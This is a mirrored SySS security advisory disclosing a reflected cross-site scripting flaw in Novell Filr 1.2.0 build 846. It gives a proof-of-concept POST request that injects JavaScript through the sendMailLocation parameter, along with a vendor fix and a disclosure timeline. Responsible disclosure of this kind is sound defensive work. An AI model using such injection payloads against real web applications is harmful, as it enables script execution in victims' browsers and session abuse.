Novell Filr 1.2.0 Build 846 Cross Site Scripting

2016-02-20T00:00:00
ID PACKETSTORM:135866
Type packetstorm
Reporter Dr. Erlijn van Genuchten
Modified 2016-02-20T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2015-055  
Product: Novell Filr  
Vendor: Novell  
Affected Version(s): 1.2.0 build 846  
Tested Version(s): 1.2.0 build 846  
Vulnerability Type: Cross-Site Scripting (CWE-79)  
Risk Level: Medium  
Solution Status: Fixed  
Vendor Notification: 2015-09-17  
Solution Date: 2015-12-16  
Public Disclosure: 2016-01-12  
CVE Reference: Not assigned  
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
Novell's Filr is an application for mobile file access and collaborative   
file sharing [1]. High security is an important aspect of the application.  
  
The SySS GmbH could find two reflected cross-site scripting  
vulnerabilities in the Filr Web application.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The SySS GmbH identified that it is possible to inject JavaScript code  
via the parameter "sendMailLocation".   
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
When looking at the details for a certain file, it is possible to send  
an e-mail to a colleague. When the following HTTP POST request is sent  
  
POST /ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1 HTTP/1.1  
Host: [host]  
Referer: https://[host]/ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1  
Cookie: JSESSIONID=[sessionid]  
Content-Length: 684  
  
sendMailLocation=https%3A%2F%2F[host]%2Fssf%2Fa%2Fdo%3Fp_name%3Dss_forum%26p_action%3D1%26binderId%3D422%26action%3Dsend_entry_email%26ssUsersIdsToAdd%3D163%26entryId%3D1232%26novl_url%3D17"%3balert(1)%2f%2f&ssUsersIdsToAdd=163&addresses=[email address]&self=on&users=+163+&searchText=&searchText_type=&searchText_selected=&groups=&searchText=&searchText_type=&searchText_selected=&ccusers=&searchText=&searchText_type=&searchText_selected=&ccgroups=&searchText=&searchText_type=&searchText_selected=&bccusers=&searchText=&searchText_type=&searchText_selected=&bccgroups=&searchText=&searchText_type=&searchText_selected=&subject=[subject]&mailBody=%3Cp%3E[content]%3C%2Fp%3E&okBtn=Senden  
  
an e-mail status is provided. When the button to return to the previous   
page is clicked, the JavaScript code is executed.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
According to information by Novell, "a fix for this issue is available in   
the Filr 1.2 Hot Patch 4, available via the Novell Patch Finder".   
  
https://www.novell.com/support/kb/doc.php?id=7017078  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2015-09-15: Vulnerability discovered  
2015-09-17: Vulnerability reported to vendor  
2015-12-16: Vulnerability published by vendor  
2016-01-12: Vulnerability published by SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Novell Filr Web site  
https://www.novell.com/products/filr/  
[1] SySS GmbH, SYSS-2015-055  
https://www.syss.de/advisories/SYSS-2015-055.txt  
[2] SySS GmbH, SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Dr. Erlijn van Genuchten of  
the SySS GmbH.  
  
E-Mail: erlijn.vangenuchten@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc  
Key ID: 0xBD96FF2A  
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCgAGBQJWlR6MAAoJEAylhje9lv8qvRYP/RVh7yLzPthf8I2uM1nfGPwG  
AsL+ajdHXVbWJrjHpaIUNwj8zpwQGZ2xVODI6vbt65u5W0gFL7M7HBNUizc+1M5Y  
iAUcZXXdDMXcatZfQAW9UDH3ukuz99QIOUHQjFCdxhj+8smX+N+WA7XXEOTS4t+h  
8ZvJPNJYEjSxcT8Bw8yt2EFJQaXENbS57MRMuYHQlHPSwOlKMxgNbkGNcfoz50Bp  
JCt4u6XCoa1vj4rueAeXLfceyThbBQqdZUo5PGrN+v7N0d+CMYTQ4qp/2J8JSmZE  
kCFobKP2pcIpXFFitw+cnzx/pFiK7cnmSxn82mA12Wh8m7knfBTaxqW4mmPsiGzk  
KmWvq9JMgI+zy6xei10dzpoxQuDiWXG+SKeP236iHEBo77FpZU6HtIpYM6anAe/A  
obr1u0iN8gVBT2dsuXbfeA2MIbwZvkLuTycFpTofL+nQzZM1pIh1QKXQ4rpv6Gjs  
RQbliQJmBuEznT/JBceEML3X5VO32jNw0x6sMG8QFXhHAKFNo93IhsMvX0Opfq9C  
qeyT3TYrb/kcFaLK/wD6stDCiTMPsEkki1xgodcSKjsfUNcDUvt1lKU6VUBoKvm5  
5UfZEqwmOb2XjJNmKED0cedcXKmkkhLK2nNoDEMP5IPyWlyLeszP/1SazfPAVZMU  
XJuH8TA6YBt+CyUg3WNZ  
=lvzi  
-----END PGP SIGNATURE-----  
`